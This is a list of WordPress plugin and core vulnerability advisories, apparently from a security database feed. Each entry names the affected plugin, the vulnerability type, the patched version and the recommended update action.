Plugin: Easy WP SMTP – WordPress SMTP and Email Logs: Gmail, Office 365, Outlook, Custom SMTP, and more

Vulnerability: Missing Authorization to Arbitrary Options Update
Patched Version: 1.3.9.1
Recommended Action: Update to version 1.3.9.1, or a newer patched version

Plugin: Booking Calendar – Event Calendar

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Frontend File Manager Plugin

Vulnerability: Unauthenticated Arbitrary Post Deletion
Patched Version: 18.3
Recommended Action: Update to version 18.3, or a newer patched version

Plugin: Scriptless Social Sharing

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Block Options
Patched Version: 3.2.2
Recommended Action: Update to version 3.2.2, or a newer patched version

Plugin: WPZOOM Portfolio Lite – Filterable Portfolio Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Redirection

Vulnerability: Cross-Site Request Forgery via ‘addRedirectRule’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Ecommerce – Two Factor Authentication

Vulnerability: Two Factor Authentication <= 1.0.4
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: School Management System – WPSchoolPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.1.17
Recommended Action: Update to version 2.1.17, or a newer patched version

Plugin: XO Slider

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: 2.9.7
Patched Version: 2.10.0
Recommended Action: Update to version 2.10.0, or a newer patched version

Plugin: Social Media Widget

Vulnerability: Spam Link Injection
Patched Version: 4.0.1
Recommended Action: Update to version 4.0.1, or a newer patched version

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Information Exposure in Debug Logs
Patched Version: 2.12.7
Recommended Action: Update to version 2.12.7, or a newer patched version

Plugin: Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More

Vulnerability: Unrestricted AJAX Actions allowing Privilege Escalation
Patched Version: 3.2.2
Recommended Action: Update to version 3.2.2, or a newer patched version

Plugin: Widgets for Google Reviews

Vulnerability: Authenticated (Contributor+) Stored XSS
Patched Version: 9.8
Recommended Action: Update to version 9.8, or a newer patched version

Plugin: Homepage Pop-up

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Manager for Icomoon

Vulnerability: Unauthenticated Arbitrary File Upload via ‘upload’
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: FireStorm Professional Real Estate Plugin

Vulnerability: SQL Injections
Patched Version: 2.06.04
Recommended Action: Update to version 2.06.04, or a newer patched version

Plugin: Swifty Page Manager

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Jeeng Push Notifications

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Shortcodes and extra features for Phlox theme

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.9.14
Recommended Action: Update to version 2.9.14, or a newer patched version

Plugin: Calculated Fields Form

Vulnerability: Authenticated (Contributor+) Open Redirect via Shortcode
Patched Version: 1.2.29
Recommended Action: Update to version 1.2.29, or a newer patched version

Plugin: WP Maps – Display Google Maps Perfectly with Ease

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.10
Recommended Action: Update to version 2.3.10, or a newer patched version

Plugin: Simple Behance Portfolio

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Job Manager & Career – Manage job board listings, and recruitments

Vulnerability: Cross-Site Request Forgery to PHP Object Injection
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: Location Manager

Vulnerability: SQL Injection
Patched Version: 2.1.0.10
Recommended Action: Update to version 2.1.0.10, or a newer patched version

Plugin: WP Cerber Security, Anti-spam & Malware Scan

Vulnerability: Multifactor Bypass
Patched Version: 8.9.3
Recommended Action: Update to version 8.9.3, or a newer patched version

Core: WordPress

Vulnerability: Authenticated Cross-Site Scripting via Avatar URL
Patched Version: 3.7.4
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.4, 3.8.4, 3.9.2

Plugin: Icons Font Loader – Load Various Web Fonts & Icons on WP

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Easy Quiz Maker

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.7.5
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.5, 3.8.5, 3.9.3, 4.0.1

Plugin: Custom 404 Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.8
Recommended Action: Update to version 3.2.8, or a newer patched version

Plugin: WCFM Marketplace – Multivendor Marketplace for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 3.4.12
Recommended Action: Update to version 3.4.12, or a newer patched version

Plugin: Private Only

Vulnerability: Multiple Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: TheCartPress eCommerce Shopping Cart

Vulnerability: No subtitle
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Feed Them Social – Social Media Feeds, Video, and Photo Galleries

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: 2.9.8.6
Recommended Action: Update to version 2.9.8.6, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: Spiffy Calendar

Vulnerability: Edit/Delete event via IDOR
Patched Version: 4.9.1
Recommended Action: Update to version 4.9.1, or a newer patched version

Plugin: WOLF – WordPress Posts Bulk Editor and Manager Professional

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.7.2
Recommended Action: Update to version 1.0.7.2, or a newer patched version

Plugin: Constant Contact Forms

Vulnerability: Missing Authorization via constant_contact_optin_ajax_handler
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Translation Exchange – Translate Your WordPress Site In Minutes!

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: cartflows-pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.11.12
Recommended Action: Update to version 1.11.12, or a newer patched version

Plugin: Customer Email Verification for WooCommerce

Vulnerability: Authentication Bypass
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Arbitrary File Upload
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: AMP for WP – Accelerated Mobile Pages

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.93
Recommended Action: Update to version 1.0.93, or a newer patched version

Plugin: Backup Scheduler

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Forum Server

Vulnerability: SQL Injection
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Authenticated Insecure Direct Object References (IDOR)
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: WiserNotify Social Proof & FOMO Notification, WooCommerce Sales Popup, Review Popups, Notification Bars & Urgency Widgets

Vulnerability: Missing Authorization
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: Video Contest WordPress Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Live Chat from ClickDesk – Live Chat – Help Desk Plugin for Websites

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: 123ContactForm for WordPress

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Social Media Share Buttons & Social Sharing Icons

Vulnerability: Arbitrary Options Deletion
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Core: WordPress

Vulnerability: Arbitrary File Upload
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Simple Ads Manager

Vulnerability: Arbitrary File Upload
Patched Version: 2.5.96
Recommended Action: Update to version 2.5.96, or a newer patched version

Plugin: Mitsol Social Post Feed

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.11
Recommended Action: Update to version 1.11, or a newer patched version

Plugin: Infusionsoft Gravity Forms Add-on

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.7
Recommended Action: Update to version 1.5.7, or a newer patched version

Plugin: Multiple Roles

Vulnerability: No subtitle
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: Youtube Feeder

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Speed Booster Pack ⚡ PageSpeed Optimization Suite

Vulnerability: Authenticated (Admin+) Remote Code Execution
Patched Version: 4.2.0
Recommended Action: Update to version 4.2.0, or a newer patched version

Plugin: WordPress Spreadsheet

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Stored Cross-Site Scripting
Patched Version: 5.6.2
Recommended Action: Update to version 5.6.2, or a newer patched version

Plugin: Ultimate Addons for Beaver Builder

Vulnerability: Missing Authentication Bypass
Patched Version: 1.24.1
Recommended Action: Update to version 1.24.1, or a newer patched version

Plugin: Filtre de surveillance gouvernemental

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Business Hours Pro WordPress Plugin

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WC Serial Numbers – Ultimate License Manager for Selling, Licensing & Securely Delivering Digital Content with WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: POEditor

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.9.8
Recommended Action: Update to version 0.9.8, or a newer patched version

Plugin: Leadster

Vulnerability: Cross-Site Request Forgery via leadster_script_code_action
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: CSS & JavaScript Toolbox

Vulnerability: Information Exposure
Patched Version: 8.4.2
Recommended Action: Update to version 8.4.2, or a newer patched version

Plugin: Ultimate Profile Builder

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Short URL

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 1.6.5
Recommended Action: Update to version 1.6.5, or a newer patched version

Plugin: Keep Backup Daily

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Simple Giveaways – Grow your business, email lists and traffic with contests

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via Settings
Patched Version: 2.45.1
Recommended Action: Update to version 2.45.1, or a newer patched version

Plugin: Pricing Table Builder – AP Pricing Tables Lite

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: LifterLMS – WP LMS for eLearning, Online Courses, & Quizzes

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.21.1
Recommended Action: Update to version 4.21.1, or a newer patched version

Plugin: Logo Showcase – Responsive Logo Carousel, Logo Slider & Logo Grid

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: All-in-One WP Migration Dropbox Extension

Vulnerability: Missing Authorization to Access Token Update
Patched Version: 3.76
Recommended Action: Update to version 3.76, or a newer patched version

Plugin: Inline Image Upload for BBPress

Vulnerability: Cross-Site Request Forgery via hm_bbpui_admin_page
Patched Version: 1.1.19
Recommended Action: Update to version 1.1.19, or a newer patched version

Plugin: Modern Events Calendar Lite

Vulnerability: Missing Authorization to Stored Cross-Site Scripting and Settings Update
Patched Version: 5.1.7
Recommended Action: Update to version 5.1.7, or a newer patched version

Plugin: Woocommerce CSV importer

Vulnerability: Arbitrary File Deletion
Patched Version: 3.4.0
Recommended Action: Update to version 3.4.0, or a newer patched version

Plugin: Under Construction, Coming Soon & Maintenance Mode

Vulnerability: Server Side Request Forgery
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Easy Social Icons

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Royal Elementor Addons and Templates

Vulnerability: Unauthenticated MailChimp API Key Disclosure
Patched Version: 1.3.71
Recommended Action: Update to version 1.3.71, or a newer patched version

Plugin: MC4WP: Mailchimp for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1.7
Recommended Action: Update to version 4.1.7, or a newer patched version

Plugin: WD WidgetTwitter

Vulnerability: Authenticated (Contributor+) SQL Injection via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Compact WP Audio Player

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Slickr Flickr

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: My YouTube Channel

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.23.0
Recommended Action: Update to version 3.23.0, or a newer patched version

Plugin: Afterpay Gateway for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: Category and Page Icons

Vulnerability: Arbitrary File Upload and Deletion
Patched Version: 0.9.2
Recommended Action: Update to version 0.9.2, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Form Submission Limit Bypass
Patched Version: 5.2.5.1
Recommended Action: Update to version 5.2.5.1, or a newer patched version

Plugin: WP Mail Log

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Email
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Qubely – Advanced Gutenberg Blocks

Vulnerability: Incorrect Authorization
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Contact Form Email

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.3.44
Recommended Action: Update to version 1.3.44, or a newer patched version

Plugin: MailChimp Subscribe Form, Optin Builder, PopUp Builder, Form Builder

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.0.9.2
Recommended Action: Update to version 4.0.9.2, or a newer patched version

Plugin: Newsletter, SMTP, Email marketing and Subscribe forms by Brevo (formely Sendinblue)

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.40
Recommended Action: Update to version 3.1.40, or a newer patched version

Plugin: Directorist: AI-Powered WordPress Business Directory Plugin with Classified Ads Listings

Vulnerability: Authenticated (Subscriber+) Insecure Direct Object Reference to Arbitrary User Password Change
Patched Version: 7.4.2.2
Recommended Action: Update to version 7.4.2.2, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Cross-Site Scripting
Patched Version: 3.5.8.2
Recommended Action: Update to version 3.5.8.2, or a newer patched version

Plugin: Appointment Hour Booking – WordPress Booking Plugin

Vulnerability: Unauthenticated iFrame Injection via Appointment Form
Patched Version: 1.3.73
Recommended Action: Update to version 1.3.73, or a newer patched version

Plugin: BP Group Documents

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress

Vulnerability: Authenticated (Contributor+) SQL Injection
Patched Version: 6.4.2.1
Recommended Action: Update to version 6.4.2.1, or a newer patched version

Plugin: Google Doc Embedder

Vulnerability: Cross-Site Scripting
Patched Version: 2.6.2
Recommended Action: Update to version 2.6.2, or a newer patched version

Plugin: WordPress Live Chat Plugin for WooCommerce – LiveChat

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.17
Recommended Action: Update to version 2.2.17, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: WP Directory Kit

Vulnerability: Unauthenticated Local File Inclusion via wdk_public_action
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Easy Forms for Mailchimp

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.8.6
Recommended Action: Update to version 6.8.6, or a newer patched version

Plugin: Google XML Sitemaps Generator

Vulnerability: Authenticated (Admin+) PHP Code Injection
Patched Version: 3.2.9
Recommended Action: Update to version 3.2.9, or a newer patched version

Core: WordPress

Vulnerability: Arbitrary User Meta Update
Patched Version: 3.7.34
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.34, 3.8.34, 3.9.32, 4.0.31, 4.1.31, 4.2.28, 4.3.24, 4.4.23, 4.5.22, 4.6.19, 4.7.18, 4.8.14, 4.9.15, 5.0.10, 5.1.6, 5.2.7, 5.3.4, 5.4.2

Plugin: WP Radio – Worldwide Online Radio Stations Directory for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Leaflet Maps Marker Pro

Vulnerability: Path Traversal
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.0.5
Recommended Action: Update to version 5.0.5, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Login Logout Menu

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Brizy – Page Builder

Vulnerability: Page Builder <= 2.3.11
Patched Version: 2.3.12
Recommended Action: Update to version 2.3.12, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.9.3
Recommended Action: Update to version 2.9.3, or a newer patched version

Plugin: Advanced Custom Fields (ACF)

Vulnerability: Missing Authorization on Option Changes
Patched Version: 5.11
Recommended Action: Update to version 5.11, or a newer patched version

Plugin: Protect WP Admin

Vulnerability: Cross-Site Scripting
Patched Version: 3.8
Recommended Action: Update to version 3.8, or a newer patched version

Plugin: iMember360is

Vulnerability: Unspecified (the source records only the affected version: 3.9.001)
Patched Version: 3.9.002
Recommended Action: Update to version 3.9.002, or a newer patched version

Plugin: Recall Products

Vulnerability: Authenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CataBlog

Vulnerability: Authenticated (Editor+) Arbitrary File Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Better Find and Replace

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: LoginWP (Formerly Peter's Login Redirect)

Vulnerability: Multiple Cross-Site Request Forgery vulnerabilities
Patched Version: 2.9.2
Recommended Action: Update to version 2.9.2, or a newer patched version

Plugin: WP Maintenance

Vulnerability: IP Restriction Bypass
Patched Version: 6.1.4
Recommended Action: Update to version 6.1.4, or a newer patched version

Plugin: BuddyPress

Vulnerability: Information Disclosure via REST API
Patched Version: 9.1.1
Recommended Action: Update to version 9.1.1, or a newer patched version

Plugin: Built-in Widgets Query extend (Custom Post Types & more)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.06
Recommended Action: Update to version 1.06, or a newer patched version

Plugin: Easy!Appointments

Vulnerability: Information Disclosure
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: WordPress Content Slide

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CM Download Manager – Document and File Management

Vulnerability: Cross-Site Scripting
Patched Version: 2.8.0
Recommended Action: Update to version 2.8.0, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Newsletter – Send awesome emails from WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 7.9.0
Recommended Action: Update to version 7.9.0, or a newer patched version

Plugin: ЮKassa для WooCommerce (YooKassa for WooCommerce)

Vulnerability: Missing Authorization
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: WP EXtra

Vulnerability: Missing Authorization to .htaccess File Modification
Patched Version: 6.3
Recommended Action: Update to version 6.3, or a newer patched version

Plugin: FireStorm Shopping Cart eCommerce Plugin

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Related Posts

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: WP-PostViews

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.63
Recommended Action: Update to version 1.63, or a newer patched version

Plugin: Video Central for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Authentication Bypass
Patched Version: 5.2.1.1
Recommended Action: Update to version 5.2.1.1, or a newer patched version

Plugin: FiboSearch – Ajax Search for WooCommerce

Vulnerability: Unspecified (the source records only the affected range: AJAX Search for WooCommerce <= 1.23.0)
Patched Version: 1.24.0
Recommended Action: Update to version 1.24.0, or a newer patched version

Plugin: Pop-up

Vulnerability: Privilege Escalation
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: FG Joomla to WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.31.0
Recommended Action: Update to version 3.31.0, or a newer patched version

Plugin: Schema Pro

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.7.8
Recommended Action: Update to version 2.7.8, or a newer patched version

Plugin: WP User Manager – User Profile Builder & Membership

Vulnerability: Arbitrary User Password Reset
Patched Version: 2.6.3
Recommended Action: Update to version 2.6.3, or a newer patched version

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Unauthenticated Login Page Disclosure
Patched Version: 9.0.1
Recommended Action: Update to version 9.0.1, or a newer patched version

Plugin: Circles Gallery

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via Admin Settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Infusionsoft Gravity Forms Add-on

Vulnerability: Unspecified (the source records only the affected version: 1.5.10)
Patched Version: 1.5.11
Recommended Action: Update to version 1.5.11, or a newer patched version

Plugin: Popup | Custom Popup Builder

Vulnerability: Missing Capabilities Check
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Wow Forms – create any form with custom style

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: wpml

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.9
Recommended Action: Update to version 3.1.9, or a newer patched version

Plugin: Sidebar Adder 2

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Essential Addons for Elementor – Popular Elementor Addon With Ready Templates, Advanced Widgets, Kits & WooCommerce Builders

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.0.9
Recommended Action: Update to version 5.0.9, or a newer patched version

Plugin: WooCommerce Box Office

Vulnerability: Missing Authorization
Patched Version: 1.1.52
Recommended Action: Update to version 1.1.52, or a newer patched version

Plugin: Motor Racing League

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: TS Webfonts for さくらのレンタルサーバ (Sakura Rental Server)

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: Advanced Database Cleaner

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: Contact Form Multi by BestWebSoft – Multiple Forms Plugin for Single WordPress Website

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Theme Blvd Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WebLibrarian

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.8.7
Recommended Action: Update to version 3.4.8.7, or a newer patched version

Plugin: Visualizer: Tables and Charts Manager for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcodes
Patched Version: 3.9.5
Recommended Action: Update to version 3.9.5, or a newer patched version

Plugin: Product Category Tree

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Youtube Freedown

Vulnerability: Remote Media File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

